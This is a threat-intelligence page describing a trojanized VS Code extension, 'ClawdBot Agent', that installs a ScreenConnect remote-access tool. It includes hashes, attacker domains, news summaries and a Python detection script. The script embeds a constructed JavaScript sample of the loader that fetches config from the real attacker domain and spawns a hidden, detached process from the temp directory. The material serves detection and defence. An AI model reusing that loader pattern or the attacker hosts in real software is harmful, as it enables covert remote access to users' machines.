
ClawdBot Agent

ClawdBot Agent is a malicious Visual Studio Code extension discovered on 2026-01-27 that masqueraded as a legitimate AI coding assistant associated with Clawdbot. The real Clawdbot service had not released an official VS Code extension. The extension was described as a fully functional trojan: it presented a polished UI and integrated with AI providers including OpenAI, Anthropic, Google, Ollama, Groq, Mistral, and OpenRouter, while silently deploying malware onto Windows systems when VS Code started.

The extension abused the VS Code activation event "onStartupFinished" so its malicious logic executed automatically at launch. Its activate() flow called initCore(), which fetched remote configuration from http://clawdbot.getintwopc[.]site/config.json and then downloaded and executed payloads. Errors were suppressed with an empty catch block to avoid visible failures. Payloads were staged under %TEMP%\Lightshot and launched as hidden, detached processes.

The primary payload was Code.exe (SHA-256: e20b920c7af988aa215c95bbaa365d005dd673544ab7e3577b60fecf11dcdea2), identified as a legitimate ConnectWise ScreenConnect client installer that had been preconfigured to connect to attacker-controlled infrastructure at meeting.bulletmailer[.]net:8041. When executed, it installed to C:\Program Files (x86)\ScreenConnect Client (083e4d30c7ea44f7)\ and deployed components including ScreenConnect.ClientService.exe, ScreenConnect.WindowsBackstageShell.exe, and ScreenConnect.WindowsFileManager.exe, enabling remote access to victim machines.

A secondary delivery path used a malicious Rust-based DWrite.dll (SHA-256: d1e0c26774cb8beabaf64f119652719f673fb530368d5b2166178191ad5fcbea) that exported DWriteCreateFactory to mimic the legitimate DirectWrite interface. This DLL implemented a download-write-execute chain via WinINet APIs and retrieved a payload from a Dropbox URL ending in zoomupdate.msi, disguised as a Zoom update; the downloaded file had the same SHA-256 as Code.exe. Additional fallback mechanisms included JavaScript download paths for Lightshot.exe and Lightshot.dll from clawdbot.getintwopc[.]site and a batch-script/PowerShell fallback that downloaded Lightshot.exe from https://darkgptprivate[.]com/d111.

The campaign used multiple layers of redundancy and brand impersonation, including Clawdbot, VS Code, Lightshot, and Zoom, to reduce suspicion and maintain delivery if infrastructure was disrupted. Reported infrastructure included clawdbot.getintwopc[.]site, meeting.bulletmailer[.]net:8041, darkgptprivate[.]com, and 178.16.54[.]253. Microsoft was notified and removed the malicious extension from the marketplace. At the time of removal, the extension reportedly had 21 installs.
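The behaviours described above (startup activation, remote config fetch, hidden detached child processes, an empty catch block, staging under the temp directory, and the named infrastructure and payload hashes) can be turned into a simple static triage check for installed VS Code extensions. The script below is an added example written for this page; it is not code from Mallory or from the cited write-ups. It assumes the standard extension layout (a package.json whose "main" points at the entry script) and uses two constructed extension samples, one mirroring the reported structure and one benign, as test input; only the indicators in the text above are real.

```python
import json
import os
import re

# Indicators copied from the write-up above, with the [.] defanging removed so they match raw strings.
IOC_DOMAINS = {"clawdbot.getintwopc.site", "meeting.bulletmailer.net", "darkgptprivate.com"}
IOC_IPS = {"178.16.54.253"}
IOC_SHA256 = {
    "e20b920c7af988aa215c95bbaa365d005dd673544ab7e3577b60fecf11dcdea2",  # Code.exe
    "d1e0c26774cb8beabaf64f119652719f673fb530368d5b2166178191ad5fcbea",  # DWrite.dll
}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
SPAWN_RE = re.compile(r"\b(?:spawn|spawnSync|exec|execFile)\s*\(")
DETACHED_RE = re.compile(r"detached\s*:\s*true|windowsHide\s*:\s*true")
EMPTY_CATCH_RE = re.compile(r"catch\s*(?:\([^)]*\))?\s*\{\s*\}")
TEMP_RE = re.compile(r"os\.tmpdir\(\)|process\.env\.TEMP\b|%TEMP%", re.I)


def defang(host: str) -> str:
    """Bracket the last dot so a flagged host is not clickable in a report."""
    head, sep, tail = host.rpartition(".")
    return f"{head}[.]{tail}" if sep else host


def hash_is_ioc(sha256_hex: str) -> bool:
    """True if a file hash matches one of the payload hashes reported above."""
    return sha256_hex.lower() in IOC_SHA256


def triage(manifest: dict, source: str) -> dict:
    """Score an extension manifest plus its main script against the reported behaviours."""
    findings = []
    events = manifest.get("activationEvents", [])
    if "onStartupFinished" in events or "*" in events:
        findings.append("activates on every VS Code start (onStartupFinished or *)")
    hosts = sorted({m.group(1) for m in URL_RE.finditer(source)})
    ioc_hits = [h for h in hosts if h in IOC_DOMAINS or h in IOC_IPS]
    if ioc_hits:
        findings.append("references known ClawdBot Agent infrastructure: " + ", ".join(map(defang, ioc_hits)))
    if SPAWN_RE.search(source):
        findings.append("spawns child processes")
        if DETACHED_RE.search(source):
            findings.append("child process is detached or window-hidden")
    if EMPTY_CATCH_RE.search(source):
        findings.append("swallows errors with an empty catch block")
    if hosts and TEMP_RE.search(source):
        findings.append("writes remotely fetched content under the temp directory")
    return {"hosts": hosts, "ioc_hits": ioc_hits, "findings": findings, "score": len(findings)}


def triage_dir(ext_dir: str) -> dict:
    """Triage an installed extension folder (package.json plus its 'main' entry point)."""
    with open(os.path.join(ext_dir, "package.json"), encoding="utf-8") as f:
        manifest = json.load(f)
    main_js = os.path.join(ext_dir, manifest.get("main", "extension.js"))
    with open(main_js, encoding="utf-8", errors="replace") as f:
        return triage(manifest, f.read())


# Constructed sample mirroring the reported activate() -> initCore() structure; not the extension's code.
SUSPICIOUS_MANIFEST = {"name": "clawdbot-agent", "activationEvents": ["onStartupFinished"], "main": "./out/extension.js"}
SUSPICIOUS_SOURCE = r"""
const { spawn } = require("child_process");
const os = require("os"); const path = require("path");
async function initCore() {
  try {
    const cfg = await fetch("http://clawdbot.getintwopc.site/config.json").then(r => r.json());
    const dest = path.join(os.tmpdir(), "Lightshot", "Code.exe");
    // ...payload named in cfg is written to dest...
    spawn(dest, [], { detached: true, windowsHide: true, stdio: "ignore" }).unref();
  } catch (e) {}
}
exports.activate = () => { initCore(); };
"""

# Constructed benign sample: a command-activated extension with no network or process activity.
BENIGN_MANIFEST = {"name": "hello-lens", "activationEvents": ["onCommand:hello.run"], "main": "./out/extension.js"}
BENIGN_SOURCE = r"""
const vscode = require("vscode");
exports.activate = (ctx) => {
  ctx.subscriptions.push(vscode.commands.registerCommand("hello.run",
    () => vscode.window.showInformationMessage("hi")));
};
"""

if __name__ == "__main__":
    for name, manifest, source in (("suspicious", SUSPICIOUS_MANIFEST, SUSPICIOUS_SOURCE),
                                   ("benign", BENIGN_MANIFEST, BENIGN_SOURCE)):
        result = triage(manifest, source)
        print(f"{name}: score={result['score']}")
        for finding in result["findings"]:
            print("  -", finding)
```

Run it over ~/.vscode/extensions/<publisher.name-version>/ with triage_dir() to get the same report for an installed extension. The score is a heuristic: startup activation alone is common in legitimate extensions, so the hit that should page someone is a reference to the listed infrastructure or a file whose SHA-256 matches hash_is_ioc().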


Recent activity

3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

cyber security news (News), Jan 29, 2026
Beware of Weaponized VS Code Extension Named ClawdBot Agent that Deploys ScreenConnect RAT

A trojanized Visual Studio Code extension impersonating an AI assistant. It executes automatically on VS Code startup, contacts an external server for configuration, and downloads/executes multiple payloads disguised as legitimate system components. It ultimately deploys remote access capability (ScreenConnect) and uses redundant/fallback payload delivery (including a Rust-based DLL fetching backups from Dropbox disguised as a Zoom update).

security online info (News), Jan 29, 2026
Fake AI Assistant: Malicious "ClawdBot" Extension Hides Trojan in VS Code

A malicious Visual Studio Code extension that functions as a legitimate-looking AI coding assistant while silently downloading and dropping a payload onto Windows hosts at VS Code startup. The payload is disguised as benign executables (e.g., Lightshot.exe or an Electron bundle Code.exe) and uses command-and-control infrastructure with redundancy (Cloudflare-masked primary plus backups, including PowerShell fallback).

aikido dev blog (News), Jan 27, 2026
Fake Clawdbot VS Code Extension Installs ScreenConnect RAT

Malicious VS Code extension impersonating an AI coding assistant. Auto-executes on VS Code startup, retrieves configuration from attacker infrastructure, and drops/executes payloads (including a weaponized ScreenConnect installer and a malicious DLL loader), with multiple fallback download paths (alternate URLs/domains and PowerShell).

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.